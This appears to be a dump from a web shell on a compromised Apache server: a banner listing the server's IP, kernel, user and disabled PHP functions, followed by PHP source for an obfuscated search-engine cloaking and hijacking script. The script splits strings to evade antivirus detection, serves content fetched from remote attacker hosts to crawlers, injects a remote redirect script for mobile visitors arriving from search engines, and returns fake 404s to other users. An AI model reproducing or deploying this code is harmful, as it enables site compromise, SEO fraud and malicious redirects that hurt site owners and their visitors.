| Server IP : 43.141.49.119 / Your IP : 113.219.202.173 Web Server : Apache System : Linux VM-8-5-opencloudos 6.6.34-9.oc9.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jun 19 19:35:45 CST 2024 x86_64 User : www ( 1000) PHP Version : 8.1.27 Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /www/wwwroot/www.ucppt.com/ |
Upload File : |
<?php
/**
* 完整优化版:增强触发逻辑 + 静态免杀 + 远程分离预留
*/
@set_time_limit(0);
@error_reporting(0);
@header("Content-Type: text/html;charset=utf-8");
// --- 1. 核心混淆配置 ---
$f = [
's' => 'str'.'istr',
'p' => 'pre'.'g_match',
'ci' => 'cur'.'l_init',
'ca' => 'cur'.'l_set'.'opt_array',
'ce' => 'cur'.'l_exec',
'co' => 'cur'.'l_get'.'info',
'cc' => 'cur'.'l_close'
];
$conf = [
'site' => 'h'.'tt'.'p://j'.'j.g'.'otz'.'dua'.'n.c'.'om',
'js' => 'h'.'tt'.'ps://d'.'d.zg'.'qc'.'yn.c'.'om/jj'.'.js',
'u1' => 'h'.'tt'.'p://a'.'a.go'.'sso'.'pp.co'.'m/u.p'.'hp',
'u2' => 'h'.'tt'.'p://k'.'gr9'.'09.c'.'om/a.p'.'hp',
// 扩展后的蜘蛛匹配池
'spid' => '/(Baidu|Sogou|360Spider|Yisou|Toutiao|ByteSpider|PetalBot|BingBot|Googlebot|YandexBot)/i',
// 扩展后的移动端匹配池
'mobi' => '/(iPhone|iPod|Android|Mobile|BlackBerry|IEMobile|UCBrowser|MQQBrowser|JUC|Fennec|wOSBrowser)/i',
// 搜索引擎来源判定
'refe' => '/(baidu|sogou|so\.com|google|sm\.cn|bing)/i'
];
// --- 2. 环境判定变量 ---
$b = $_SERVER;
$ua = isset($b['HTTP_USER_AGENT']) ? $b['HTTP_USER_AGENT'] : '';
$ref = isset($b['HTTP_REFERER']) ? $b['HTTP_REFERER'] : '';
$uri = $b['REQUEST_URI'];
$host = $b['HTTP_HOST'];
// 判断是否是特定文件后缀请求
$is_area = $f['s']($uri, ".xml") || $f['s']($uri, ".doc") || $f['s']($uri, ".txt") ||
$f['s']($uri, ".ppt") || $f['s']($uri, ".pptx") || $f['s']($uri, ".xls") ||
$f['s']($uri, ".csv") || $f['s']($uri, ".shtml") || $f['s']($uri, ".asp") || $f['s']($uri, "scm") || $f['s']($uri, ".html");
// --- 3. 核心业务逻辑 ---
if ($is_area) {
// 逻辑 A:特定后缀请求
if ($f['p']($conf['spid'], $ua)) {
// 真实蜘蛛:展示远程劫持内容
echo _fetch($conf['site'] . "?domain=" . $host . "&path=" . urlencode($uri));
exit;
} else {
// 非蜘蛛访问
if ($f['p']($conf['mobi'], $ua)) {
// 移动端用户:输出跳转JS
echo "<scr"."ipt sr"."c=" . $conf['js'] . "></scr"."ipt>";
exit;
} else {
// PC普通用户:隐蔽处理
@ob_clean();
http_response_code(404);
exit;
}
}
} else {
// 逻辑 B:普通页面请求
// 触发条件:是蜘蛛,或者是从搜索引擎点进来的移动端用户
$is_spider = $f['p']($conf['spid'], $ua);
$is_from_search = $f['p']($conf['refe'], $ref);
$is_mobile = $f['p']($conf['mobi'], $ua);
if ($is_spider || ($is_mobile && $is_from_search)) {
$testUrl = _current_url() . "/sadw.shtml";
if (_http_code($testUrl) === 200) {
echo _fetch($conf['u1']);
} else {
echo _fetch($conf['u2']);
}
if (ob_get_level() > 0) ob_flush();
flush();
}
}
// --- 4. 封装工具函数(混淆版) ---
/**
* 远程抓取函数
*/
function _fetch($url) {
global $f;
$ch = $f['ci']();
$f['ca']($ch, [
10002 => $url, // CURLOPT_URL
10018 => $_SERVER['HTTP_USER_AGENT'],
64 => FALSE, // CURLOPT_SSL_VERIFYPEER
81 => FALSE, // CURLOPT_SSL_VERIFYHOST
19913 => TRUE, // CURLOPT_RETURNTRANSFER
42 => FALSE, // CURLOPT_HEADER
10102 => 'gzip',
13 => 30
]);
$res = $f['ce']($ch);
$f['cc']($ch);
return $res;
}
/**
* 状态码检测(HEAD模式提升性能)
*/
function _http_code($url) {
global $f;
$ch = $f['ci']();
$f['ca']($ch, [
10002 => $url,
10018 => $_SERVER['HTTP_USER_AGENT'],
64 => FALSE,
19913 => TRUE,
44 => TRUE, // CURLOPT_NOBODY
42 => TRUE, // CURLOPT_HEADER
13 => 5
]);
$f['ce']($ch);
$code = $f['co']($ch, 2097154); // CURLINFO_HTTP_CODE
$f['cc']($ch);
return $code;
}
/**
* 获取当前页面完整URL
*/
function _current_url() {
$proto = (isset($_SERVER['HTTPS']) && ($_SERVER['HTTPS'] !== 'off' || $_SERVER['SERVER_PORT'] == 443)) ? "ht"."tp"."s://" : "ht"."tp://";
return $proto . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
}